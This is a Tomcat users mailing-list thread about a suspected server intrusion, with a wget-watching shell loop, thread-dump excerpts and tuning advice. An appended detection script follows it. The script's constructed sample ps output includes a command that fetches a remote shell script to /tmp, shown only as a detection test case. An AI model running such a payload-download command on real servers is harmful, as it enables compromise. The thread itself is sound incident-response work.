> Subject: Re: Regarding i think an intrusion
> From: lsantagost...@gmail.com
> To: users@tomcat.apache.org
> 
> Hello Chris, but this logfile was only one day.
MG>Ay Caramba!
> 
> Maybe I had a concept mismatch trying to capture the exact moment when the
> execution begins.
> 
> My command was
> 
> while [ true ]; do
>   CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v "127.0.0.1" | wc -l)   # wget processes not aimed at localhost
>   if [ "$CUENTO" -gt 0 ]; then
>     PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }')         # every java PID on the box
>     echo -e "Se encontro wget corriendo, sacando dump de JVM..."; kill -3 $PIDJAVA  # "wget found, dumping JVM"; SIGQUIT -> thread dump
>   fi
>   sleep 3
> done
> 
> Maybe too many dumps all together, now I'm trying to get a "live" capture
> without luck =(
> 
> If you know a better method, please let me know.
> 
> Thanks for your effort, kind regards,
> Leonardo
> 
> Regards,
> Leonardo Santagostini
MG>Tomcat APR cannot use WebSockets with JDK 1.6 ...you need to use JDK 1.7 (now)
MG>this
"ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10 tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
   java.lang.Thread.State: TIMED_WAITING (sleeping)
 at java.lang.Thread.sleep(Native Method)
 at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
 at java.lang.Thread.run(Thread.java:662)
MG>These informational log entries produce a LOT of noise
MG>log4j.properties
MG>log4j.logger.org.quartz=OFF      # (Shut up, Quartz)

MG>that
"ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656 runnable [0x0000000046f34000]
   java.lang.Thread.State: RUNNABLE
 at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
 at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
 at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
 at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
 at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
 at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
 at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
 at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
 at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
 at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
 at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
MG>TOO MUCH!
MG>you need to change match-type from regex to wildcard in Tuckey .\WEB-INF\urlrewrite.xml...for example
<!-- regex is not necessary -->
    <!-- rule match-type="regex">
        <name>BasicRule</name>
        <from>basicfrom</from>
        <to>basicto</to>
    </rule -->
    <rule match-type="wildcard">
        <name>BasicRule</name>
        <from>basicfrom</from>
        <to>basicto</to>
    </rule>
MG>you can see that name, from and to are the same

MG>Every time you see 'Runnable' and 'locked' (for example)
"http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d waiting on condition [0x000000004ad9b000]
   java.lang.Thread.State: RUNNABLE
 at java.util.Vector.addElement(Vector.java:572)
 - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
 at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
 at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
 - locked <0x00000006e0303d80> (a java.util.Hashtable)

MG>you need to kill the process or change the slow process ...(log4j updateParents), for example in log4j
package org.apache.log4j;
public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
                                  org.apache.log4j.spi.RendererSupport {
  private org.apache.log4j.spi.LoggerFactory defaultFactory;
  private java.util.Vector listeners;
  //  Hashtable ht;   // original map; getLogger()/updateParents() lock on it
  // values are either Logger or ProvisionNode, so the value type stays Object
  private final java.util.concurrent.ConcurrentHashMap<CategoryKey,Object> ht =
      new java.util.concurrent.ConcurrentHashMap<CategoryKey,Object>();

// much later
public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory factory) {
    ....
      } else if (o instanceof org.apache.log4j.ProvisionNode) {
        //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
        logger = factory.makeNewLoggerInstance(name);
        logger.setHierarchy(this);
        ht.put(key, logger);
        updateChildren((ProvisionNode) o, logger);
        updateParents(logger);
        return logger;
      }

http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
MG>Understand?
MG>Martín

> 
> <http://ar.linkedin.com/in/santagostini>
> 
> 2014-05-05 13:06 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net
> >:
> 
> >
> > Leonardo,
> >
> > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > > Ok, again it's uploaded.
> > >
> > > This is the link
> > >
> > >
> > https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
> >
> > 1/2
> > >
> > GiB log file? Hrm.
> >
> > It doesn't even have any calls to Runtime.exec in it. If you have a
> > snapshot of a thread dump (and only the thread dump, I don't need 3
> > weeks of your logs) that you took while the "intrusion" was taking
> > place, post that.
> >
> > If you don't, then I think you're out of luck.
> >
> > Sounds like a bad time to go on holiday.
> >
> > - -chris
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> > For additional commands, e-mail: users-h...@tomcat.apache.org
> >
> >
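A tighter version of the polling loop Leonardo posted earlier in the thread, added here as an example (it is not code from either poster): it keeps the same wget/127.0.0.1 filter but also catches curl, records each downloader's parent PID so the spawning shell can be traced back to the JVM, and takes at most one thread dump per cooldown window instead of one every three seconds. Assumes Linux procps `ps`/`pgrep`, a Tomcat launched through `org.apache.catalina.startup.Bootstrap`, and `jstack` if present (otherwise `kill -3` as in the original); the sample `ps` output in `demo` is constructed.

```shell
#!/bin/sh
# Added example, not from the thread: one JVM dump per cooldown window instead of one every
# 3 s, plus each downloader's parent PID. Assumes procps ps; jstack if present, else kill -3.
COOLDOWN=${COOLDOWN:-300}                 # seconds between two thread dumps
DUMP_DIR=${DUMP_DIR:-/tmp/jvm-dumps}
TOMCAT_MAIN='org.apache.catalina.startup.Bootstrap'   # assumption: stock Tomcat launcher
# stdin: `ps -eo pid,ppid,comm,args`. Prints "pid ppid args" for every wget/curl that is
# not talking to 127.0.0.1 (the same exclusion the original loop used).
suspicious_downloaders() {
    awk 'NR > 1 && ($3 == "wget" || $3 == "curl") && index($0, "127.0.0.1") == 0 {
            pid = $1; ppid = $2; $1 = ""; $2 = ""; $3 = ""; sub(/^ +/, "")
            print pid, ppid, $0 }'
}

# $1 = now, $2 = epoch of the previous dump (0 if none): true once the cooldown has elapsed.
should_dump() { [ $(( $1 - $2 )) -ge "$COOLDOWN" ]; }

take_dump() {                             # $1 = JVM pid, $2 = epoch for the file name
    mkdir -p "$DUMP_DIR"
    if command -v jstack >/dev/null 2>&1; then
        jstack -l "$1" > "$DUMP_DIR/tomcat-$1-$2.txt" 2>&1
    else
        kill -3 "$1"                      # SIGQUIT: the JVM writes the dump to catalina.out
    fi
}

monitor() {
    last=0
    while :; do
        hits=$(ps -eo pid,ppid,comm,args | suspicious_downloaders)
        if [ -n "$hits" ]; then
            now=$(date +%s)
            printf '%s downloader seen:\n%s\n' "$(date -u +%FT%TZ)" "$hits"
            jvm=$(pgrep -o -f "$TOMCAT_MAIN" || true)
            if [ -n "$jvm" ] && should_dump "$now" "$last"; then
                take_dump "$jvm" "$now"; last=$now
            fi
        fi
        sleep 3
    done
}

# Constructed ps output (not a real capture) so the filter can be exercised offline.
demo() {
    printf '%s\n' '  PID  PPID COMMAND COMMAND' \
        ' 4321     1 java    /usr/bin/java org.apache.catalina.startup.Bootstrap start' \
        ' 4400  4321 sh      sh -c wget http://203.0.113.5/x.sh -O /tmp/x.sh' \
        ' 4401  4400 wget    wget http://203.0.113.5/x.sh -O /tmp/x.sh' \
        ' 4402  4321 curl    curl http://127.0.0.1:8080/manager/status' | suspicious_downloaders
}
if [ "${1:-}" = "--run" ]; then monitor; else demo; fi
```

Run with `--run` to start the monitor; without arguments it only runs the constructed sample through the filter, which reports the wget (PID 4401, parent 4400) and ignores the localhost curl.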